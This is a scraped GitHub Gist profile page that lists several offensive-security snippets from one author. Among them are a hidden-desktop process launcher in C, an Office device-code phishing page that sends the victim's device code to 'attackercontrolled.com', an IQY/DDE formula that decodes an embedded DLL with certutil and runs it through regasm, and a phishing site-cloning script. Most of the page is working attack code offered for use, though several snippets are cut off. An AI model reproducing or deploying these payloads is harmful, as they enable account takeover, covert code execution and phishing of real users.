Skip to content

Instantly share code, notes, and snippets.

View Mr-Un1k0d3r's full-sized avatar
💭
# > $

Mr.Un1k0d3r Mr-Un1k0d3r

💭
# > $
View GitHub Profile
@Mr-Un1k0d3r
Mr-Un1k0d3r / generate.sh
Created October 18, 2021 18:20
Generate shellcode bash script
# Usage:
# ./generate.sh file.o
# \x0f\x01\x..
# ./generate.sh file.o ,0x
# ,0x0f,0x01,0x..
#!/bin/bash
DELIMITER=$2
if [ -z "$DELIMITER" ]
@Mr-Un1k0d3r
Mr-Un1k0d3r / run.c
Created August 11, 2021 18:07
spawn an invisible process
// To compile: gcc64.exe run.c -o run.exe
// To run: run.exe cmd.exe "/c whoami"
#include <Windows.h>
#include <stdio.h>
int main(int argc, char **argv) {
CHAR cDesktop[] = "hiddendesktop";
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);
@Mr-Un1k0d3r
Mr-Un1k0d3r / generate.html
Last active January 18, 2024 21:55
office device code phishing
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
@Mr-Un1k0d3r
Mr-Un1k0d3r / remote.iqy
Last active September 7, 2024 05:12
IQY File Remote Payload POC
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'
@Mr-Un1k0d3r
Mr-Un1k0d3r / poc.iqy
Created August 1, 2018 18:59
IQY File + Embedded DLL POC
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
@Mr-Un1k0d3r
Mr-Un1k0d3r / cloning.sh
Created November 7, 2017 16:14
Lazy website cloning
#!/bin/bash
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"

Keybase proof

I hereby claim:

  • I am Mr-Un1k0d3r on github.
  • I am mrun1k0d3r (https://keybase.io/mrun1k0d3r) on keybase.
  • I have a public key whose fingerprint is B6EC B08B 2E02 722D 719E F173 83C5 5463 945D 2EA6

To claim this, I am signing this object: